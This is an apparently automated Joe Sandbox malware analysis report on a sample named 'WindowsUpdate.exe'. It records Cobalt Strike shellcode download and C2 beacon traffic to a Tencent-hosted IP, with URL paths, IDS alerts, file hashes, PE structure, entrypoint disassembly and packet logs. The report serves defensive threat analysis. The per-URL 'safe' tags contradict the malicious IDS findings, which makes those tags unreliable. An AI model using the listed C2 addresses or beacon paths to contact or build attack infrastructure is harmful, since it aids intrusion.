https://146.56.219.146/WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/pWindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssJ4WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/ssets/code-3d7b701fc6eb.cssC4WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/rWindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.css:WindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.csszWindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jsGWindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssJJWindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/ssets/code-3d7b701fc6eb.cssq4WindowsUpdate.exe, 00000000.00000003.2279686684.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssgAWindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770042000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
146.56.219.146
unknownChina
45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompatrue

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1577955
Start date and time:2024-12-18 22:51:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 17s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:WindowsUpdate.exe
Detection:MAL
Classification:mal64.evad.winEXE@1/0@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 79%
  • Number of executed functions: 7
  • Number of non-executed functions: 51
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: WindowsUpdate.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompala.bot.m68k.elfGet hashmaliciousMiraiBrowse
  • 123.206.102.25
loligang.ppc.elfGet hashmaliciousMiraiBrowse
  • 111.231.39.16
x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
  • 154.8.240.203
sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
  • 152.141.135.2
arm.nn-20241218-0633.elfGet hashmaliciousMirai, OkiruBrowse
  • 139.155.31.203
1.elfGet hashmaliciousUnknownBrowse
  • 212.129.243.181
jew.mips.elfGet hashmaliciousUnknownBrowse
  • 188.131.185.115
jew.mpsl.elfGet hashmaliciousUnknownBrowse
  • 106.54.63.220
cd#U9988.exeGet hashmaliciousUnknownBrowse
  • 81.71.103.11
i486.elfGet hashmaliciousMiraiBrowse
  • 150.158.255.169

JA3 Fingerprints

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
51c64c77e60f3980eea90869b68c58a8Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
basx.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
list.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146
steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
  • 146.56.219.146

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):5.591432751472315
TrID:
  • Win64 Executable GUI (202006/5) 92.65%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:WindowsUpdate.exe
File size:15'360 bytes
MD5:375049ae392572882d3402d0678389ef
SHA1:a3534e4451f28d4162e2d39dd70ef7b4496d4807
SHA256:7d598c046110849932052e38c67071473753e809cb5d55d2223226e810b1475a
SHA512:5e37a2c009f43516f91ca4c0eef2bb7baea2392bd65005b183718ab2e9e5f07fa4d86e1b67abf0f6d3a49f1c228f0583fb4046167dbd84b0057778c0d0bf2a69
SSDEEP:192:G3TQOAzI2rxNQPJ8+JeuB3GlM3Q5tfroKD14W18gi6a0H1IjHd:W2zQPJ8i5B3t3SD1t3m7d
TLSH:DD625D8ABDA705FEF1180675CD334F55D2BA7510076253C70391A1650EA36E1367F6CE
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m..j)..9)..9)..9 .q9#..9...8*..9...8:..9...8#..9...8*..9Y .8+..9)..9...90..8/..90..8(..90..9(..90..8(..9Rich)..9...............

File Icon

Icon Hash:90cececece8e8eb0

Static PE Info

General

Entrypoint:0x140001ca0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x67613436 [Tue Dec 17 08:20:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:4ff98788b6fefb0963649625d2cc7416

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F89D095788Ch
dec eax
add esp, 28h
jmp 00007F89D0957327h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [0000135Bh]
dec eax
mov ecx, ebx
call dword ptr [0000134Ah]
call dword ptr [00001354h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00001388h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [0000136Ch]
test eax, eax
je 00007F89D09574B9h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [00002C72h]
call 00007F89D095755Eh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [00002D59h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [00002CE9h], eax
dec eax
mov eax, dword ptr [00002D42h]
dec eax
mov dword ptr [00002BB3h], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [00002CB7h], eax
mov dword ptr [00002B8Dh], C0000409h
mov dword ptr [00002B87h], 00000001h
mov dword ptr [00002B91h], 00000001h

Rich Headers

Programming Language:
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x39440xa0.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x1e0.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50000x1b0.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x70000x30.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x33f00x70.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x32b00x140.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x30000x190.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x178c0x1800a06bc94cdb2a6f8da2a0159bf699f626False0.6280924479166666zlib compressed data6.284198941816348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x30000xfac0x10008b4abf84149e06006579064d111c9aaaFalse0.389404296875data4.187288505810747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x40000xed80xa00fb11ec925ba45e5f452bc5e581aee40cFalse0.524609375Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, numeric, rows 0, columns 04.134903482212727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata0x50000x1b00x200deab9599a6751e2b06aba87c8c398346False0.49609375data3.262649438066295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x60000x1e00x200d223c232889289f7388583adeff234e1False0.525390625data4.697597008251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x70000x300x2005baf708285fe24b733ca12b378119fa4False0.123046875data0.7128484083759542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
RT_MANIFEST0x60600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

Imports

DLLImport
VCRUNTIME140.dll__current_exception_context, __current_exception, __C_specific_handler, memset, memcpy
api-ms-win-crt-runtime-l1-1-0.dllterminate, _seh_filter_exe, _set_app_type, _initialize_onexit_table, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___argv, __p___argc, _crt_atexit, _exit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _register_onexit_function
api-ms-win-crt-math-l1-1-0.dll__setusermatherr
api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
api-ms-win-crt-heap-l1-1-0.dll_set_new_mode
KERNEL32.dllGetCurrentThreadId, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, GetModuleHandleW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, RtlCaptureContext, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Suricata IDS Alerts

TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
2024-12-18T22:52:03.210751+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449731146.56.219.146443TCP
2024-12-18T22:52:04.652742+01002035442ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M11146.56.219.146443192.168.2.449731TCP
2024-12-18T22:52:07.200084+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449732146.56.219.146443TCP
2024-12-18T22:52:07.947770+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449732TCP
2024-12-18T22:52:14.771106+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449733146.56.219.146443TCP
2024-12-18T22:52:15.525510+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449733TCP
2024-12-18T22:52:21.964454+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449736146.56.219.146443TCP
2024-12-18T22:52:22.696537+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449736TCP
2024-12-18T22:52:29.287463+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449741146.56.219.146443TCP
2024-12-18T22:52:30.023519+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449741TCP
2024-12-18T22:52:36.776166+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449742146.56.219.146443TCP
2024-12-18T22:52:37.532557+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449742TCP
2024-12-18T22:52:44.382950+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449743146.56.219.146443TCP
2024-12-18T22:52:45.142764+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449743TCP
2024-12-18T22:52:51.956452+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449744146.56.219.146443TCP
2024-12-18T22:52:52.708825+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449744TCP
2024-12-18T22:52:59.510929+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449746146.56.219.146443TCP
2024-12-18T22:53:00.248345+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449746TCP
2024-12-18T22:53:06.936853+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449763146.56.219.146443TCP
2024-12-18T22:53:07.673380+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449763TCP
2024-12-18T22:53:14.336190+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449779146.56.219.146443TCP
2024-12-18T22:53:15.082077+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449779TCP
2024-12-18T22:53:21.968112+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449799146.56.219.146443TCP
2024-12-18T22:53:22.780642+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449799TCP
2024-12-18T22:53:29.435887+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449816146.56.219.146443TCP
2024-12-18T22:53:30.195703+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449816TCP
2024-12-18T22:53:36.668368+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449835146.56.219.146443TCP
2024-12-18T22:53:37.399876+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449835TCP
2024-12-18T22:53:43.978487+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449853146.56.219.146443TCP
2024-12-18T22:53:44.714622+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449853TCP
2024-12-18T22:53:51.218394+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449869146.56.219.146443TCP
2024-12-18T22:53:51.994563+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449869TCP
2024-12-18T22:53:58.505604+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449886146.56.219.146443TCP
2024-12-18T22:53:59.239615+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response1146.56.219.146443192.168.2.449886TCP
2024-12-18T22:54:05.618971+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449905146.56.219.146443TCP

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Dec 18, 2024 22:52:01.349164963 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:01.349199057 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:01.349323034 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:01.360709906 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:01.360727072 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:03.210597038 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:03.210751057 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:03.672658920 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:03.672684908 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:03.673738003 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:03.673810959 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:03.686572075 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:03.727359056 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.210458994 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.210558891 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.221580029 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.221602917 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.221681118 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.221693993 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.221743107 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.425523996 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.425774097 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.425789118 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.425851107 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.453901052 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.454140902 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.454149961 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.454226017 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.479160070 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.479331017 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.479341030 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.479394913 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.613475084 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.613672972 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.613704920 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.614113092 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.652745008 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.652935028 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.652955055 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.653033018 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.677866936 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.678062916 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.678073883 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.678241014 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.710832119 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.711010933 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.711020947 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.711081028 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.735569954 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.735663891 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.735675097 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.735827923 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.759457111 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.759638071 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.759648085 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.759726048 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.787254095 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.787503004 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.787513971 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.787563086 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.843909025 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.844219923 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.844253063 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.844345093 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.859724045 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.859899044 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.859910011 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.859965086 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.880713940 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.880872011 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.880881071 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.880932093 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.894196987 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.894330978 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.894340038 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.894530058 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.903481007 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.903583050 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.903592110 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.903779984 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.915386915 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.915543079 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.915576935 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.915751934 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.924407005 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.924597979 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.924607038 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.924665928 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.935447931 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.935551882 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.935561895 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.935606003 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.979587078 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.980062962 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.980076075 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.980144024 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.986665964 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.986958981 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.986968040 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.987042904 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.998096943 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.998209953 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:04.998223066 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:04.998275995 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:05.006747961 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:05.006839991 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:05.006851912 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:05.006941080 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:05.015728951 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:05.015819073 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:05.015827894 CET44349731146.56.219.146192.168.2.4
Dec 18, 2024 22:52:05.015938997 CET49731443192.168.2.4146.56.219.146
Dec 18, 2024 22:52:05.040385962 CET44349731146.56.219.146192.168.2.4
